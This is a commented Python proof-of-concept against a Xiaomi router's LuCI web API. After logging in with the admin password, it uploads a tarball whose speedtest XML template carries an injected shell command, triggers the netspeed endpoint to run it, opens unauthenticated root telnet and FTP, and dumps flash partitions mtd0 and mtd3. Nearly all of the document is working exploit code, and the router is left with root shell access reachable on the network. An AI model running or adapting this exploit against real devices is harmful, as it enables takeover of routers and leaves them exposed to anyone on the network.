"""Windows-only proof-of-concept against a Xiaomi router's LuCI web API.

Flow, as written below (every step talks plain HTTP to the router, so the
whole exchange is observable on the wire):

1. Find the default gateway by parsing one hop of ``tracert`` output.
2. Ask the router's admin password on stdin, derive the login hash the
   firmware expects (salted SHA-1, then SHA-1 with a fresh nonce) and log
   in via ``/api/xqsystem/login`` to obtain a session token (``stok``).
3. Render ``template/speedtest_urls_template.xml`` with the router IP and
   the ``command`` string, pack it with ``main/main.sh`` and ``main/busybox``
   into a tarball, upload it through ``/api/misystem/c_upload`` and trigger
   ``/api/xqnetdetect/netspeed``; the script prints that this enables
   telnet and ftpd on the router.
4. Log in over telnet as ``root`` with no password, ``dd`` two flash
   partitions (``/dev/mtd0`` and ``/dev/mtd3``) to ``/tmp`` and pull them
   back over FTP into ``data/backup.bin`` and ``data/eeprom.bin``.

Artifacts to be aware of: the script leaves telnet and FTP reachable on the
router, the uploaded files live wherever the firmware extracts the tarball
(not visible from this file), and the local ``main/`` tarball and rendered
XML are deleted again after use.

Review notes (not fixed here, code left byte-identical):

* ``get_mac`` uses a bare ``except:``, which also swallows
  ``KeyboardInterrupt``/``SystemExit``; ``except requests.RequestException``
  would be the narrow form.
* ``router_ip_address`` is only bound if some token on the chosen
  ``tracert`` line is a dotted quad; otherwise the first use raises
  ``NameError`` rather than a clear message.
* The two ``telnetlib.Telnet`` sessions are never closed; the ``RETR``
  f-strings have no placeholders; ``base64`` and ``socket`` are imported
  but unused.
"""
import os
import sys
import re
import time
import base64
import random
import hashlib
import requests
import socket
import subprocess
import tarfile
import ftplib
import telnetlib

# Uncomment the first line to route every HTTP request through a local
# intercepting proxy (useful for inspecting what the script actually sends).
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}

# Shell command substituted into the ``{command}`` placeholder of the XML
# template below; it is backgrounded so the request that triggers it returns.
command = "((sh /tmp/main.sh) &)"

# Gateway discovery: run ``tracert`` limited to one hop (``-h 1``, no DNS via
# ``-d``) under code page 437 so the output is plain ASCII, then take the 5th
# line of the output and split it on spaces.  Index 4 is assumed to be the
# first-hop line — TODO confirm this holds across Windows locales/versions.
line4 = subprocess.check_output(["cmd","/c","chcp","437","&","tracert","-d","-h","1","1.1.1.1"]).decode().split("\r\n")[4].strip().split(" ")
# The first token that looks like a dotted quad (4 dot-separated parts) is
# taken as the router address.  NOTE(review): ``data`` is reused as a plain
# string variable further down; nothing here validates the octets.
for data in line4:
    if len(data.split(".")) == 4:
        router_ip_address = data
        break


def get_mac():
    """Return the router's ``deviceId`` scraped from the LuCI landing page.

    Fetches ``http://<router>/cgi-bin/luci/web`` and pulls the value of the
    inline ``deviceId = '...'`` assignment out of the HTML.  Any request
    failure prints a message and exits the process with status 1.

    Raises:
        IndexError: if the page does not contain a ``deviceId`` assignment
            (the ``[0]`` on an empty ``findall`` result).
    """
    try:
        r0 = requests.get("http://{router_ip_address}/cgi-bin/luci/web".format(router_ip_address=router_ip_address), proxies=proxies)
    except:
        # Bare except: also catches KeyboardInterrupt/SystemExit (see module
        # docstring); the code is left as-is in this documentation pass.
        print ('No Xiaomi Router found ... Check the router performance and try again.')
        sys.exit(1)
    mac = re.findall(r'deviceId = \'(.*?)\'', r0.text)[0]
    return mac


def create_nonce(mac):
    """Build the login nonce ``"<type>_<deviceId>_<unix time>_<random>"``.

    ``type`` is always 0 here, ``deviceId`` is the value from ``get_mac``,
    time is whole seconds, and the random part is a non-cryptographic
    ``random.randint(0, 10000)``.  The nonce only has to be unique per
    login attempt, so ``random`` (rather than ``secrets``) is adequate for
    this purpose.
    """
    type_ = 0
    deviceId = mac
    time_ = int(time.time())
    rand = random.randint(0,10000)
    return "%d_%s_%d_%d"%(type_, deviceId, time_, rand)


def calc_password(nonce, account_str):
    """Return ``sha1(nonce + account_str)`` as a lowercase hex digest.

    Used twice below: once to salt the user's password with a fixed string,
    once to bind that result to the per-login nonce.  SHA-1 is what the
    router's login scheme consumes, not a choice this script can change.
    """
    m = hashlib.sha1()
    m.update((nonce + account_str).encode('utf-8'))
    return m.hexdigest()


mac = get_mac()
nonce = create_nonce(mac)
# The clear-text password never leaves this host: only
# sha1(nonce + sha1(password + <fixed salt>)) is sent.  The hex constant is
# presumably the salt baked into the router firmware's login page — verify
# against the firmware before relying on it.
account_str = calc_password(input("Enter your router password: "), 'a2ffa5c9be07488bbb04a3a47d3c5f6a')
password = calc_password(nonce, account_str)
# Form-encoded login body; ``logtype=2`` is passed through as the firmware
# expects it (semantics not visible from this file).
data = "username=admin&password={password}&logtype=2&nonce={nonce}".format(password=password,nonce=nonce)
# Plain HTTP login; the browser-like User-Agent is cosmetic.
r2 = requests.post("http://{router_ip_address}/cgi-bin/luci/api/xqsystem/login".format(router_ip_address=router_ip_address), data = data, headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, proxies=proxies)
# Session token pulled out of the JSON body with a regex; raises IndexError
# if the login was rejected (no ``token`` field in the response).
stok = re.findall(r'"token":"(.*?)"',r2.text)[0]

# Render the XML template with the router address and the ``command`` string
# defined at the top.  ``str.format`` does no escaping, so the template is
# trusted to contain only the two placeholders.
with open("template/speedtest_urls_template.xml","rt") as f:
    template = f.read()
data = template.format(router_ip_address=router_ip_address,command=command)
# Written with LF line endings so the file is unchanged when read on the
# router side.
with open("main/speedtest_urls.xml",'wt',newline='\n') as f:
    f.write(data)
# Tarball members are stored under their bare names (second ``add`` arg),
# not under ``main/``.
with tarfile.open("main/payload.tar.gz", "w:gz") as tar:
    tar.add("main/speedtest_urls.xml", "speedtest_urls.xml")
    tar.add("main/main.sh", "main.sh")
    tar.add("main/busybox", "busybox")
os.remove("main/speedtest_urls.xml")

print("Uploading the exploit...")
# Multipart upload of the tarball as field ``image``.  NOTE(review): the file
# handle passed in ``files`` is never explicitly closed; on CPython it is
# released when the temporary dict is collected, so the ``os.remove`` below
# usually succeeds on Windows, but this is implementation-dependent.
r3 = requests.post("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/misystem/c_upload".format(router_ip_address=router_ip_address,stok=stok), files={"image":open("main/payload.tar.gz",'rb')}, proxies=proxies)
os.remove("main/payload.tar.gz")

print("Enabling telnet and ftpd...")
# Triggering the speed test makes the router consume the uploaded XML; the
# response bodies r3/r4 are never inspected, so failures go unnoticed here.
r4 = requests.get("http://{router_ip_address}/cgi-bin/luci/;stok={stok}/api/xqnetdetect/netspeed".format(router_ip_address=router_ip_address,stok=stok), proxies=proxies)
print("Successfully!")

print('Creating a backup...')
# Telnet session 1: unauthenticated root shell (no password prompt is
# awaited — the code goes straight from ``login:`` to the prompt).  Each
# ``read_until`` blocks until the prompt string appears; there is no
# timeout, so a missing prompt hangs the script.
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
# Raw dump of flash partition 0 to tmpfs on the router.
tn.write(b"dd if=/dev/mtd0 of=/tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
# Anonymous FTP (no ``login`` call) is used to fetch the dump; the f-string
# has no placeholders and is equivalent to a plain string.
ftp=ftplib.FTP(router_ip_address)
with open('data/backup.bin', 'wb') as file:
    ftp.retrbinary(f'RETR /tmp/backup.bin', file.write)
# Clean up the dump on the router; the telnet session itself is not closed.
tn.write(b"rm /tmp/backup.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
print('Backup created!')

print('backup eeprom...')
# Telnet session 2: same sequence for partition 3 (rebinding ``tn`` leaves
# the first session to be closed by garbage collection, if at all).
tn = telnetlib.Telnet(router_ip_address)
tn.read_until(b"login:")
tn.write(b"root\n")
tn.read_until(b"root@XiaoQiang:~#")
tn.write(b"dd if=/dev/mtd3 of=/tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
ftp=ftplib.FTP(router_ip_address)
with open('data/eeprom.bin', 'wb') as file:
    ftp.retrbinary(f'RETR /tmp/eeprom.bin', file.write)
tn.write(b"rm /tmp/eeprom.bin\n")
tn.read_until(b"root@XiaoQiang:~#")
print('eeprom backuped!')